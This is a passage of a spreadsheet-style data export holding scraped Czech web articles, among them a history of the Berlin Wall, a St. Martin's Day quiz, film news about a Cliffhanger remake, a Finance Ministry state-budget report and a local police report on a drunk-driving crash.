    <t>Rozdělila Berlín i&amp;nbsp;tisíce lidských životů: Od pádu Berlínské zdi letos uplyne 35&amp;nbsp;let Z doby pádu Berlínské zdi v roce 1989. Zeď dělila město také u Braniborské brány. Rozpůlila Berlín na západní a východní část. Kromě města a sféry vlivu rozdělila také nespočet lidských příběhů. Od pádu Berlínské zdi, která odstartovala listopadové změny ve východní Evropě , letos 9. listopadu uplyne 35 let. Článek si také můžete poslechnout v audioverzi. Stavba Berlínské zdi „započala“ v noci z 12. na 13. srpna 1961 rozdělením hranice města ostnatým drátem. Ten o tři dny později začala nahrazovat opravdová zeď. K její výstavbě, která se do historie zapsala jako symbol studené války, vedlo především poválečné uspořádání Evropy a imperiální sklony Sovětského svazu . Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Vetřelci v české krajině: 10 invazních druhů, jež ohrožují přírodu i zdraví Křišťálové lustry září v Kamenickém Šenově už tři sta let. Jak dnes vypadají? Váš nový přítel chlad: Zlepšuje zdraví i náladu. Pozvete ho domů? Roadtrip po Namibii . Dobrodružství, které musíte zažít Za husou i vínem . 10 tipů, kde si pochutnat na svatomartinských hodech První fáze: sovětská blokáda Berlína Poražené Německo bylo po druhé světové válce rozděleno na čtyři okupační zóny - americkou, britskou, francouzskou a sovětskou. Stejně tak byl rozdělen i Berlín . Ten se ale nacházel v samotném středu zóny, nad kterou měl nadvládu Sovětský svaz . Část města připadající spojencům, se dvěma miliony berlínských obyvatel, tak byla obklíčená sovětským vlivem a závislá na západních dodávkách. Josif Stalin , tehdejší představitel Sovětského svazu , chtěl Berlín i Německo celé. S obnovou západní části země, a tudíž i poloviny její metropole, která byla naplánována podle Marshallova plánu, nesouhlasil. Dne 23. června 1948 tak uvalil na Berlín blokádu - do západní části města nechal zabránit přístupům po silnicích, železnici i vodě. Druhý den navíc Berlín odstřihl od elektřiny i dodávek potravin ze Západu. Západní spojenci kvůli špatně sepsaným smlouvám mohli obyvatelům Berlína , kteří v sovětské zóně tvořili ostrov demokracie, pomáhat pouze letecky. Na pomoci odstřihnutým západním Berlíňanům se podílela spousta zemí, včetně například Kanady nebo soukromých leteckých společností. Berlínská zeď v číslech: Stavba zdi: začátek 13. srpna 1961. Pád zdi: 9. listopadu 1989. Celková délka: 155 km. Délka mezi Východním a Západním Berlínem : 43,1 km. Délka mezi Západním Berlínem a Braniborskem : 111 km. Počet strážních věží: 302. Počet pohraničníků: 14 tisíc. Průměrná výška zdi: 3,6 m. Průměrná šířka zdi: 1,2 m. Počet zdařilých útěků: 5 075. Počet obětí při pokusu o útěk: Nejméně 138 lidí bylo zabito a 260 zraněno (čísla se v různých zdrojích liší). Sověti se snažili leteckou pomoc Západu nabourat, v Berlíně dokonce zahájili rozsáhlou propagandu, ale marně. Blokáda byla neúčinná, a proto ji 12. května 1949 zrušili. Do západní části Berlína začala přijíždět první auta, o 11 měsíců později i vlaky. Ve stejném roce se Německo oficiálně rozdělilo na dva státy - západní Spolkovou republiku Německo ( SRN ) a Sovětským svazem ovlivněnou Německou demokratickou republiku ( NDR ). Volný pohyb rozděleným městem Ačkoli byl Berlín rozdělen, mezi jeho západní a východní částí docházelo k volnému pohybu obyvatel. V druhé polovině 50. let kvůli tomu odešlo velké množství východoněmeckého obyvatelstva na Západ. Netrvalo dlouho a touha lidí po svobodě vyvolala reakci německých komunistů. Východní Německo totiž mezi lety 1949 a 1961 opustily asi tři miliony lidí. Byli to hlavně studenti nebo kvalifikovaní pracovníci, což ekonomice země přinášelo velké ztráty. Nejsnáze se východní Němci mohli na Západ dostat právě přes Berlín - hranice tudy totiž vedla přímo středem města, a byla tak poměrně složitě kontrolovatelná. Malba Brežněva a Honeckera na pozůstatku Berlínské zdi v dnešní East Side Gallery . Komunistický vůdce NDR Walter Ulbricht proto vybízel Nikitu Chruščova , tehdejšího představitele Sovětského svazu , aby Berlín sjednotil, a to třeba i za použití síly. Chruščov proto Spojeným státům , zejména prezidentovi Johnu Fitzgeraldu Kennedymu , hrozil „mírovou smlouvou“, která měla obě německé republiky sjednotit. Američané však byli ochotni bránit svá práva, a to i vojenskými prostředky. Kennedy pak v televizním projevu 25. července 1961 prohlásil, že jsou Spojené státy odhodlány udržet status quo Západního Berlína a přístupových komunikací k městu. Chruščov proto musel jednat. Mírové smlouvy byly ale v kontextu studené války odloženy, protože si Sověti uvědomovali americkou dominanci v oblasti jaderných zbraní. Začalo se tak hledat jiné řešení. Stavba zdi ze lží a betonu Ještě v červnu roku 1961 řekl Ulbricht novinářům, že „nikdo žádnou zeď stavět nehodlá“. Netrvalo však dlouho a v srpnu téhož roku dostal od Chruščova povolení, jehož předmětem nebylo nic jiného, než její výstavba. Berlín tak pár dnů nato protnul ostnatý drát, který později nahradila 155 kilometrů dlouhá zeď. Zeď, která ohraničila Západní Berlín a oddělila ho od NDR . Východoněmečtí vojáci přes noc přehradili tramvajové koleje, zazdili vstupy do berlínského metra, rozdělili ulice a zároveň i tisíce lidských osudů. Betonová hranice dosahovala výšky až pěti metrů. Zakončena byla ostnatým drátem a střežena strážními věžemi, střílnami a minami. Do 80. let 20. století se systém zdí, elektrifikovaných plotů a opevnění táhl 45 kilometrů přes Berlín , dalších 120 pak kolem vnějších hranic Západního Berlína . Komunisté navíc zeď neustále inovovali, aby zamezili pokusům o útěk Východoněmců na její druhou stranu. Střed Berlínské zdi tvořilo takzvané pásmo smrti. Pohled ze strany Západního Berlína . Pád Berlínské zdi: mohl za to omyl Zeď rozdělovala město dlouhých 28 let. A ačkoliv se o její pád zasloužila spíš náhoda, podnebí konce 80. let politickým změnám nasvědčovalo. V listopadu 1989 se německý režim už několik měsíců rozpadal. V Sovětském svazu navíc v pozici prvního generálního tajemníka stanul Michail Gorbačov , který prosazoval perestrojku a postupné uvolňující reformy Východního bloku . Z Východního Německa také v létě tohoto roku uprchly desítky tisíc Němců přes západoněmecké ambasády v Československu i Maďarsku . Osud Berlínské zdi nakonec rozhodla jedna jediná tisková konference. Ta se odehrávala 9. listopadu 1989 v sálu východoberlínské Mohrenstrasse a předcházel jí sjezd Jednotné socialistické strany Německa ( SED ). Na sjezdu se jednalo mimo jiné o možnosti, že by soukromé cesty z NDR do zahraničí kvůli návštěvám rodinných příslušníků mohly probíhat bez dokumentů. Východoněmecký politik Günter Schabowski , který vystoupil na tiskové konferenci, pak dostal přímo u pultíku do rukou papír s čerstvě dokončeným ujednáním. Nevěděl však, že je to jen návrh, nikoli hotové stanovisko. „Soukromé cesty do zahraničních zemí mohou probíhat bez dokumentů, za účelem návštěvy rodinných příslušníků…,“ přečetl Schabowski do mikrofonu. A po dotazech novinářů to prohlásil za daný fakt, který dle něj „začíná platit okamžitě“. Netušil, že tím strhne lavinu. Po tiskové konferenci, kterou ve večerních zprávách odvysílaly západní televizní stanice, se k hraničním přechodům začali scházet Berlíňané. Hlídači se samopaly jen stáli a nechali Němce přes zeď, která je téměř tři desítky let rozdělovala, volně procházet. V dalších dnech se už obyvatelé jedné z největších evropských metropolí společně pouštěli do demontáže zdi. S pádem Berlínské zdi pak nakonec padla i celá železná opona a Východní blok se zhroutil. Zbytky a památníky na Berlínskou zeď Checkpoint Charlie. V německé metropoli se stále nachází několik zachovalých částí Berlínské zdi, která město po dobu 28 let rozdělovala. Mezi ně patří například: East Side Gallery Nejdelší zbývající úsek zdi o délce 1,3 kilometru se nachází u řeky Sprévy . Její východní stranu pomalovalo 118 umělců z 21 zemí, proto se jí přezdívá nejdelší galerie pod širým nebem. Z East Side Gallery pochází i známá malba Honeckera a Brežněva při bratrském socialistickém polibku od Dmitrije Vruleba. Bösebrücke Hraniční přechod u Bornholmer Strasse byl prvním místem, kde se zeď 9. listopadu večer otevřela. Podél Bornholmer Strasse na severu se rozkládá pustina lemovaná bývalou bezpečnostní zdí Hinterland a zahrádkářskými koloniemi. Cestu kolem zdi zde lemuje více než 100 okrasných třešní. Byly darem japonského obyvatelstva z roku 1990 jako výraz sympatií Japonců ke sjednocení Německa . Památník Berlínské zdi na Bernauer Strasse Památník na Bernauer Strasse je rozsáhlým muzejním areálem. Součástí je také zachovalý úsek zdi, strážní věže a takzvaná mrtvá zóna - střežený úsek mezi zdmi. Potsdamer Platz Několik zbytků zdi se nachází také na Postupimském náměstí . Okolí zdobí informační tabule, které historii místa vykreslují v době rozděleného Berlína . Checkpoint Charlie Checkpoint Charlie byl v období studené války nejznámějším hraničním přechodem. Dnes se na místě nachází kopie původní tabule s nápisem ve čtyřech jazycích, která lidem připomínala, že opouštějí americkou část města a vstupují do části té sovětské a naopak. Na místě je také kopie první strážní budky z roku 1961.</t>
  </si>
  <si>
    <t>20241101_184_3244151363_e2de770f451c26be5aac.html</t>
  </si>
  <si>
    <t>e2de770f451c26be5aac</t>
  </si>
  <si>
    <t>Svatomartinský kvíz: Jak dobře znáte svátek sv. Martina? Otestujte se a uvařte si něco chutného</t>
  </si>
  <si>
    <t>Svatomartinský kvíz: Jak dobře znáte svátek sv. Martina ? Otestujte se a uvařte si něco chutného Svátek sv. Martina si obvykle spojujeme s hojností jídla a pití. Víte ale, kdo vlastně byl svatý Martin? A co všechno patří na svatomartinskou tabuli? Zkuste si své znalosti otestovat v našem kvízu. Pranostika praví, že svatý Martin přijíždí na bílém koni , což po krásném teplém podzimu není příliš potěšující. Náladu si můžeme vylepšit pomocí pokrmů, které se pojí se svátkem svatého Martina ... Mohlo by Vás zajímat: Svatomartinská husa: Tradice sahá až do středověku. Husa prý skončila na pekáči, neboť prozradila úkryt sv. Martina Svatý Martin v kuchyni Svatomartinské menu může vypadat následovně: nejprve servírujeme polévku kaldoun se dvěma typy knedlíčků, dále nesmí chybět pečená husa s přílohou, ideálně s chutnými lokšemi a se zelím . Sladký dezert zajistí martinské rohlíčky . Všechny výše uvedené recepty pochází z kulinářského webu Toprecepty.cz, kde najdete také články s nápaditými tipy, aby vaše sváteční menu bylo bezchybné. Dočtete se, jak správně upéct drůbež , jak připravit několik typů přílohových knedlíků i jak udělat z kysaného zelí to nejlepší přílohové. Pojďte si nyní otestovat své znalosti o svátku sv. Martina v našem kvízu , který prověří nejen vaše znalosti z oblasti gastronomie. Otestujte se v našem kvízu! Kdy se slaví svátek svatého Martina? První otázka 11. listopadu 24. prosince 1. listopadu Které jídlo je tradiční součástí svatomartinských hodů? Vepřová pečeně Pečená kachna Pečená husa aké počasí se podle pranostik spojuje s příchodem svatého Martina? Svatý Martin přijíždí na bílém koni Svatý Martin přináší bouře a vichřice Svatý Martin ohlašuje první jarní květiny Co podle legendy symbolizuje svatomartinská husa? Bohatství a hojnost Obyčejné venkovské jídlo Husy rušily Martina při kázání, proto skončily na pekáči Jaké víno se tradičně poprvé ochutnává na svatého Martina ? Beaujolais Svatomartinské víno Portské Svatý Martin je patronem... Pastýřů a chovatelů dobytka Vinařů, vojáků a žebráků Pekařů a cukrářů Jaký dezert se často podává ke svatomartinské huse? Jablečný štrúdl Svatomartinské rohlíčky Tiramisu Svatý Martin byl původně vojákem ve službách: Římské říše Galie Francie Které koření je typické pro přípravu pečené svatomartinské husy? Vanilka a skořice Majoránka a kmín Kardamom a muškátový oříšek Kde byl svatý Martin podle legendy pohřben? V Římě V Tours V Paříži Autor: Jana Jánská Autor Jana Jánská</t>
  </si>
  <si>
    <t>131350</t>
  </si>
  <si>
    <t>159940</t>
  </si>
  <si>
    <t>20241101_185_3244185664_982dcb644b0e2f1ea304.html</t>
  </si>
  <si>
    <t>982dcb644b0e2f1ea304</t>
  </si>
  <si>
    <t>Cliffhanger 2 se mění v katastrofu. Stallone i režisér utekli, film mění hlavního hrdinu</t>
  </si>
  <si>
    <t>Cliffhanger 2 se mění v katastrofu. Stallone i režisér utekli, film mění hlavního hrdinu Pokud jste se těšili na pokračování devadesátkového horského thrilleru Cliffhanger se Sylvesterem Stallonem , bude pro vás nové obsazení zklamáním. Stallone se totiž do plánovaného remaku nevrátí. V novém zpracování jej překvapivě nahradí jiné hvězdy. 1. 11. 2024 14:00 | Filmové novinky V loňském roce bylo ohlášeno, že se Sylvester Stallone vrátí v další ikonické roli jeho kariéry, a to jako Gabe Walker v pokračování horolezeckého akčního thrilleru Cliffhanger. Původně plánovaný návrat Stallona ke třicet let starému snímku se ale nakonec neuskuteční. Po dříve ohlášeném režisérovi Ricu Romanu Waughovi ( Pád anděla ) nyní pracuje na projektu jako režisér zkušený Jaume Collet - Serra ( Mělčiny, Black Adam ), který si do hlavní role přivzal Lily James. James, která se na roli připravovala náročným horolezeckým tréninkem, ve filmu ztvární Naomi, dceru zkušeného horského průvodce Raye Coopera , kterého si zahraje charismatický Pierce Brosnan . Děj se bude točit kolem luxusního horského střediska v Dolomitech, kde Ray se svou dcerou provozují luxusní chatu. Během víkendového výletu s miliardářovým synem se stanou terčem útoku bandy únosců. Naomi, kterou stále pronásleduje nehoda při horolezectví, se stane svědkem útoku a podaří se jí uprchnout. Aby zachránila svou rodinu, musí se postavit svému strachu a bojovat o přežití. Nový scénář vychází z povídky Any Lily Amirpour a zasvěcenci obeznámení s projektem jej popsali jako variaci na Smrtonosnou past s důrazem na vztah otce a dcery. Tvůrčí tým se zaměřuje na maximální autenticitu a působivý vizuální zážitek filmu. Režisér Collet - Serra vyzdvihl význam natáčení přímo v lokalitě Dolomit s použitím velkoformátových kamer, což má divákům přinést skutečně intenzivní filmový zážitek. Snímek by měl zamířit do kin, datum premiéry ale ještě oznámeno nebylo. Fanoušci si však kladou oprávněnou otázku, zda dává takový film vůbec smysl. Bez Stallona a s twistem na hlavní ženskou postavu se mnozí obávají, že jde o další laciné parazitování na slavné značce, které Hollywood převedl již opakovaně, aniž by chápal kouzlo původního filmu. Petr Kollár Formovaly ho akčňáky, sci-fi a horory z osmdesátek a devadesátek. Posléze na VHS během dvou dnů bingewatchnul Twin Peaks a s ním se zrodila i láska k dlouhým vyprávěním, které s příchodem Netflixu získaly tu pravou platformu. Dnes se věnuje hollywoodské klasice, hongkongskému akčnímu filmu, japonskému anime i evropskému artu. Před pár lety se začetl do komiksových světů (a v poslední době mangy obzvláště). Rád se prochází po horách, miluje lesy a nepohrdne kvalitním pivem . 18 778 zobrazení 2 se líbí 2 447 zobrazení 56 se líbí 2 138 zobrazení 36 se líbí 4 630 zobrazení 158 se líbí Autor: Filmtoro</t>
  </si>
  <si>
    <t>20241101_186_3244168851_94427d387d772312cd7c.html</t>
  </si>
  <si>
    <t>94427d387d772312cd7c</t>
  </si>
  <si>
    <t>Plnění státního rozpočtu ČR za leden až říjen 2024</t>
  </si>
  <si>
    <t>Plnění státního rozpočtu ČR za leden až říjen 2024 Přehled o státním majetku, stanoviska k zákonu č. 219/2000 Sb., informace o stavu privatizačních projektů. CZ Domů Ministerstvo Média Tiskové zprávy 2024 Plnění státního rozpočtu ČR za leden až říjen 2024 Plnění státního rozpočtu ČR za leden až říjen 2024 01.11.2024 14:00 Print Hospodaření státního rozpočtu skončilo na konci října deficitem ve výši 200,7 mld. Kč. Po očištění o příjmy a výdaje na projekty z Evropské unie a finančních mechanismů činil schodek 199,7 mld. Kč. Meziroční zlepšení salda o 38,2 mld. Kč bez započtení dopadu prostředků z Evropské unie a finančních mechanismů bylo taženo 5,5% nárůstem výběru daní a pojistného. I přes značný růst mandatorních titulů včetně obsluhy státního dluhu převyšují výdaje rozpočtu loňský objem jen mírně (+0,8 %). Pozitivně vnímám především stagnaci výdajů v době, kdy je řada mandatorních výdajů navyšována valorizačními mechanismy, dodržováním zákonných závazků a povinností splácet dluhy minulé vlády. Zbyněk Stanjura ministr financí “Pozitivně vnímám především stagnaci výdajů v době, kdy je řada mandatorních výdajů navyšována valorizačními mechanismy, dodržováním zákonných závazků a povinností splácet dluhy minulé vlády,“ řekl ministr financí Zbyněk Stanjura a dodal: „Ve zbývající části roku lze očekávat zvýšené tlaky na rozpočet nejen v oblasti investic, ale i při řešení následků zářijových povodní. Nicméně aktuální požadavky na finanční prostředky z navýšené rozpočtové rezervy budou pro letošek dostačující a plánovaný deficit po novele zákona o rozpočtu ve výši 282 mld. Kč by mohl být dodržen.“ Plnění státního rozpočtu k 31.10.2024 (57,67 kB) Tabulky k plnění státního rozpočtu ČR za říjen 2024 Detailní informace jsou po uzávěrce finančních výkazů uvedeny obvykle 25. den po skončení měsíce v systému Monitor. Příjmy státního rozpočtu: Příjmy státního rozpočtu byly na konci října o 1,5 % (+24,0 mld. Kč) vyšší než před rokem. Inkaso pojistného vzrostlo o 52,0 mld. Kč, čistě daňové příjmy o 21,8 mld. Kč, k čemuž přispěla také změna rozpočtového určení daní (+8,7 mld. Kč). Saldo naopak zhoršovaly přijaté prostředky z Evropské unie a finančních mechanismů (-28,8 mld. Kč), nejvíce doposud meziročně nižší refundace prostředků z Národního plánu obnovy (-23,9 mld. Kč), ale také převody výnosů z majetkových účastí státu (-27 mld. Kč). Inkaso daně z příjmů fyzických osob ze závislé činnosti (+16,3 %, +14,5 mld. Kč) bylo podpořeno růstem mezd a změnami přijatými v rámci ozdravného balíčku, například snížením hranice pro druhou sazbu daně či úpravou zdanění vybraných nepeněžních benefitů. Nicméně řada změn z konsolidačního balíčku se projeví až při ročním zúčtování daně, tedy v následujícím roce. Na inkaso daně z příjmů právnických osob (-9,5 %, -15,8 mld. Kč), podobně jako u daně z příjmů fyzických osob placené poplatníky (+2,2 %, +0,1 mld. Kč) mělo vliv vyrovnání daně za zdaňovací období 2023 splatné v roce 2024 a zaplacené zálohy. Meziroční pokles inkasa ze zdanění právnických osob byl způsoben loňskou vysokou srovnávací základnou, kterou navýšilo vyrovnání daně za zdaňovací období 2022. Zálohy v roce 2022 byly hrazeny dle daňových povinností za období 2020 a 2021, avšak rok 2022 byl mimořádně ziskový, a proto i vyrovnání daně za rok 2022 bylo nezvykle vysoké. Inkaso daně z neočekávaných zisků ve výši 27,2 mld. Kč (+5,5 %, +1,4 mld. Kč) bylo pozitivně ovlivněno vyrovnáním daně za rok 2023 a zaplacenými zálohami na rok 2024. Další záloha bude splatná v prosinci. Příspěvky z pojistného na sociální zabezpečení jsou v tomto roce zvýšeny znovuzavedením nemocenského pojištění zaměstnanců se sazbou ve výši 0,6 % a s dosavadním dopadem necelých 10 mld. Kč, kterým by mělo dojít k vyrovnání schodku systému nemocenského pojištění. Pozitivní vliv na inkaso má i zvýšení minimálního vyměřovacího základu pojistného na sociální pojištění osob samostatně výdělečně činných. Objem pojistného meziročně vzrostl o 9,2 % (+52,0 mld. Kč). Do inkasa daně z přidané hodnoty (+5,2 %, +15,4 mld. Kč) se promítá růst výdajů domácností na spotřebu, stejně jako dopady změn účinných od ledna 2024. Především jde o redukce počtu sazeb daně na základní 21 % a sníženou 12 % a přesunutí vybraného zboží a služeb ze snížené do základní sazby daně z přidané hodnoty. Inkaso spotřebních a energetických daní (+10,1 %, +12,4 mld. Kč) vzrostlo hlavně díky spotřební dani z minerálních olejů a tabákových výrobků. Meziroční růst inkasa spotřební daně z minerálních olejů (+14,0 %, +8,4 mld. Kč) je způsoben vrácením sazby spotřební daně z motorové nafty od 1. srpna 2023 na původní úroveň počátku roku 2022 (9,95 Kč/l z 8,45 Kč/l). Vývoj inkasa spotřební daně z tabákových výrobků (+7,5 %, +3,4 mld. Kč) odráží navýšení sazby a zdanění dosud nedaněných výrobků. Meziroční růst inkasa daní z elektřiny a zemního plynu je odrazem zrušení některých osvobození. Inkaso spotřební daně z lihu pokleslo (-4,4 %, -0,3 mld. Kč), nicméně očekáváme jeho růst v období před koncem roku před dalším zvýšením daně od 1. ledna 2025. Výběr ostatních spotřebních a energetických daní nezaznamenal ve srovnání s loňským rokem významnější výkyvy. Příjmy státního rozpočtu za leden až říjen DPH - daň z přidané hodnoty SD - spotřební daně z minerálních olejů, tabákových výrobků včetně surového tabáku a zahřívaných tabákových výrobků, piva , vína a meziproduktů, lihu a také včetně tzv. energetických daní a odvodu z elektřiny DPPO - daně z příjmů právnických osob z přiznání a vybíraná srážkou DPFO - daně z příjmů fyzických osob zahrnující daň ze závislé činnosti, z přiznání a vybíranou srážkou Mimořádné daně - daň z neočekávaných zisků (windfall tax) a odvod z nadměrných příjmů; Pojistné - pojistné na sociální zabezpečení a příspěvek na státní politiku zaměstnanosti. Nezahrnuje pojistné na veřejné zdravotní pojištění odváděné zdravotním pojišťovnám EU/FM - příjmy z Evropské unie a finančních mechanismů, které představují již proplacený podíl EU/FM na financování společných programů s ČR Ostatní - dopočet do celku daňových i ostatních příjmů nedaňové povahy. Výdaje státního rozpočtu: Celkové výdaje meziročně vzrostly o 14,1 mld. Kč (+0,8 %). Pro jejich tempo byl určující vývoj běžných výdajů (+1,8 %, +29,1 mld. Kč) tažený transfery státním fondům (+30,1 mld. Kč), dávkami důchodového pojištění (+22,9 mld. Kč) a ostatními sociálními dávkami (+8,8 mld. Kč), obsluhou státního dluhu (+12,2 mld. Kč), platbou veřejného zdravotního pojištění za státní pojištěnce (+10,6 mld. Kč), nákupy Ministerstva obrany (+8,9 mld. Kč) a výdaji na výzkum, vývoj a inovace (+1,4 mld. Kč). Dynamiku výdajů naopak snižovala podpora poskytovaná v oblasti energií (-56,0 mld. Kč) a investice (-15,0 mld. Kč) do značné míry determinované požadavky státních fondů na dotace ze státního rozpočtu. Na objemově nejvýznamnějších sociálních dávkách (+4,4 %, +31,7 mld. Kč) se nejvíce podílely výplaty důchodů (+4,0 %, +22,9 mld. Kč). Jejich výši kromě loňského mimořádného navýšení ovlivnila lednová řádná valorizace o 1,8 %. Rostoucí objem příspěvků na péči (+2,7 mld. Kč) souvisí s navýšením částek v návaznosti na změnu zákona o sociálních službách platnou od července tohoto roku. Vzrostl i příspěvek na bydlení (+2,2 mld. Kč), podpory v nezaměstnanosti (+2,0 mld. Kč) a nemocenské (+1,9 mld. Kč). Mimořádnou okamžitou pomoc v posledních dvou měsících navýšily žádosti občanů postižených zářijovými povodněmi (+0,5 mld. Kč). Naopak klesla výplata rodičovského příspěvku (-1,6 mld. Kč). Čerpání ostatních dávek prozatím nevybočuje od standardního vývoje předchozího roku. Výrazný nárůst neinvestičních dotací státním fondům (+79,9 %, +30,1 mld. Kč) určovaly prostředky poskytnuté Státnímu fondu dopravní infrastruktury (+13,1 mld. Kč), Státnímu zemědělskému intervenčnímu fondu (+15,8 mld. Kč) a Státnímu fondu životního prostředí (+1,4 mld. Kč). Meziroční navýšení je dáno především časovým nesouladem v poskytování dotací, které překračují loňské plnění o téměř 33 p. b. Obsluha státního dluhu představovala pro státní rozpočet výdaj v objemu 66,8 mld. Kč (+22,4 %, +12,2 mld. Kč). Při očištění o úrokové výnosy z protiinflačních státních dluhopisů, které byly v nejvyšších objemech vyplaceny loni v lednu, by tempo růstu dosahovalo vyšších hodnot. Valorizačním mechanismem upravené zvýšení měsíčních plateb veřejného zdravotního pojištění za tzv. státní pojištěnce z 1 900 Kč na 2 085 Kč vedlo k posílení zdrojů veřejného zdravotního systému z prostředků státního rozpočtu o 10,6 mld. Kč (+9,2 %). Běžné nákupy (bez obsluhy státního dluhu), které meziročně vzrostly o 8,3 mld. Kč (+14,2 %), byly nejvíce navýšeny výdaji Ministerstva obrany (+8,9 mld. Kč) souvisejícími s pořizováním víceúčelových nadzvukových letounů F-35 (+3,9 mld. Kč) a dalšími činnostmi a rozvojem bojových sil Armády České republiky . Za růstem neinvestičních transferů příspěvkovým a podobným organizacím o 3,7 mld. Kč (+4,8 %) stály nejvíce výdaje Ministerstva školství , mládeže a tělovýchovy (+3,4 mld. Kč) navýšené podporou výzkumu, experimentálního vývoje a inovací (+2,2 mld. Kč) a příspěvky na provoz vysokých škol (+1,1 mld. Kč). Naopak výrazně klesly běžné transfery podnikatelům (-52,3 %, -60,7 mld. Kč). Velká část jejich objemu i poklesu byla spojená s dotacemi do oblasti energetiky (-56,0 mld. Kč). Kompenzace za dodávku elektřiny a plynu zákazníkům a na ztráty z důvodu zastropování jejich cen dosáhly 8,2 mld. Kč (-40,0 mld. Kč) a dotace provozovateli přenosové soustavy 1,3 mld. Kč (-14,1 mld. Kč). Pomoc firmám v energeticky náročných odvětvích v tomto roce není vyplácena (-4,6 mld. Kč). Podpora obnovitelných zdrojů energie v objemu 15,3 mld. Kč (+2,7 mld. Kč) byla dočasně vyšší z důvodu odlišné splatnosti čtvrtletních záloh. Z ostatních transferů klesla podpora poskytovaná prostřednictvím společných progamů Evropské unie a České republiky (-3,1 mld. Kč), zejména OP Podnikání a inovace pro konkurenceschopnost 2014+ (-3,4 mld. Kč). Neinvestiční transfery územním rozpočtům se meziročně snížily o 7,9 mld. Kč (-3,5 %). Jejich součástí jsou dotace regionálnímu školství v objemu 166,1 mld. Kč (+4,2 mld. Kč) zahrnující prostředky na platy pedagogických a nepedagogických pracovníků na základních a středních školách. Výdaje na spolufinancování sociálních služeb (25 mld. Kč) se meziročně nezměnily a jejich objem již téměř dosáhl celoročního plánu. Za snížením transferů stálo prozatím nižší zapojení prostředků společných programů s Evropskou unií (-8,1 mld. Kč), v prvé řadě OP Jan Amos Komenský (-7,3 mld. Kč), klesající kompenzační příspěvek na ubytování osob s dočasnou ochranou (-4,7 mld. Kč) a loňské prezidentské volby (-0,6 mld. Kč). Odvody vlastních zdrojů do rozpočtu Evropské unie , jejichž výše je mimo jiné odvislá od úrovně hrubého národního důchodu a daně z přidané hodnoty, meziročně klesly o 3,1 mld. Kč (-6,5 %). Kapitálové výdaje v objemu 140,0 mld. Kč představují meziroční pokles o 9,7 % (-15,0 mld. Kč), který je nižší než tempo stanovené rozpočtovým plánem. Do průběhu uvolňování a realizace investic státu se v tomto roce promítá i skutečnost, že v letošním roce přecházíme na novou víceletou finanční perspektivu u evropských strukturálních a investičních fondů. Téměř polovinu těchto prostředků (68,8 mld. Kč; -8,7 mld. Kč) představovaly výdaje spolufinancované z rozpočtu Evropské unie . Na poklesu se nejvíce podílely nepravidelně poskytované dotace Státnímu fondu životního prostředí (-8,7 mld. Kč), Státnímu zemědělskému intervenčnímu fondu (-1,8 mld. Kč) a Státnímu fondu dopravní infrastruktury (-1,1 mld. Kč). Naopak vzrostly investiční nákupy Ministerstva obrany (+3,9 mld. Kč) zaměřené na udržení a rozvoj schopností Armády České republiky . Transfery vysokým školám (+4,0 mld. Kč) navyšovala především realizace projektů Národního plánu obnovy, OP Spravedlivá transformace a OP Jan Amos Komenský. Výdaje státního rozpočtu za leden až říjen Platy - platy a související výdaje vyplácené na úrovni organizačních složek státu (tj. bez platů vyplácených ve školství, zdravotnictví, příspěvkových organizacích) NT SS - neinvestiční transfery soukromoprávním subjektům směřované podnikatelským subjektům a neziskovým a podobným organizacím (např. spolkům, fundacím, ústavům, obecně prospěšným společnostem, církvím, politickým stranám a hnutím) NT VRÚÚ - neinvestiční transfery veřejným rozpočtům ústřední úrovně, které zahrnují především odvod veřejného zdravotního pojištění za státní pojištěnce a transfery státním fondům NT ÚSC - neinvestiční transfery veřejným rozpočtům územní úrovně představují z velké části dotace na platy v regionálním školství, transfery podle zákona o sociálních službách a příspěvěk na výkon státní správy. NT PO - neinvestiční transfery příspěvkovým a podobným organizacím představují zejména příspěvky na činnost zřízeným příspěvkovým organizacím, ale i dotace vysokým školám a veřejným výzkumným institucím Sociální dávky - zejména výdaje na starobní, invalidní, vdovské, vdovecké a sirotčí důchody, ale i vyplacené dávky nemocenského pojištění, státní sociální podpory, pěstounské péče, pomoci v hmotné nouzi, dávky pro příslušníky ozbrojených sil při skončení služebního poměru či osoby se zdravotním postižením Jiné NV - ostatní neinvestiční výdaje (dopočet do celku), které zahrnují především běžné provozní výdaje, výdaje na obsluhu státního dluhu, odvody do rozpočtu Evropské unie , kompenzace dopravcům za slevy nařízené státem apod. Investice - kapitálové výdaje realizované organizačními složkami státu v podobě přímých investic nebo transferů zejména státním fondům, municipalitám, podnikatelským subjektům, příspěvkovým a neziskovým organizacím, vysokým školám či veřejným výzkumným institucím. Dokumenty ke stažení Letenská 15, 118 10 Praha Telefon Autor: oddělení Komunikace s médii</t>
  </si>
  <si>
    <t>59710</t>
  </si>
  <si>
    <t>28060</t>
  </si>
  <si>
    <t>20241101_187_3244361797_9075ee6021f3849285ff.html</t>
  </si>
  <si>
    <t>9075ee6021f3849285ff</t>
  </si>
  <si>
    <t>Aš: Řidič měl pozitivní dechovou zkoušku V neděli 13. října letošního roku krátce po páté hodině ranní došlo v Aši na Chebsku k dopravní nehodě osobního automobilu. K té mělo dojít tak, že třiadvacetiletý řidič osobního vozidla značky Audi jedoucí ulicí Okružní ve směru z ulice Selbská zřejmě nepřizpůsobil rychlost a narazil vpravo do zadní části zaparkovaného vozidla značky Peugeot . To bylo vlivem nárazu odraženo do dalšího zaparkovaného osobního automobilu značky Ford. Policisté u řidiče po dopravní nehodě provedli orientační dechovou zkoušku na přítomnost alkoholu , která vyšla s pozitivním výsledkem 1,47 promile. Muži byl na místě zadržen řidičský průkaz a byla mu zakázána další jízda. Svým jednáním způsobil škodu přibližně 300 tisíc korun. Chebští dopravní policisté sdělili podezření ze spáchání přečinu ohrožení pod vlivem návykové látky třiadvacetiletému muži z Chebska . V případě prokázání viny mu tak hrozí trest odnětí svobody až na tři roky. nprap. Jan Bílek Autor: REGIONZAPAD.CZ</t>
  </si>
  <si>
    <t>811</t>
  </si>
  <si>
    <t>20241101_188_3244150305_23e9e3db0798abcb99b2.html</t>
  </si>
  <si>
    <t>23e9e3db0798abcb99b2</t>
  </si>
  <si>
    <t>Chtěli byste žít život jako v&amp;nbsp;Postřižinách? Nyní se váš sen může změnit ve skutečnost</t>
  </si>
  <si>
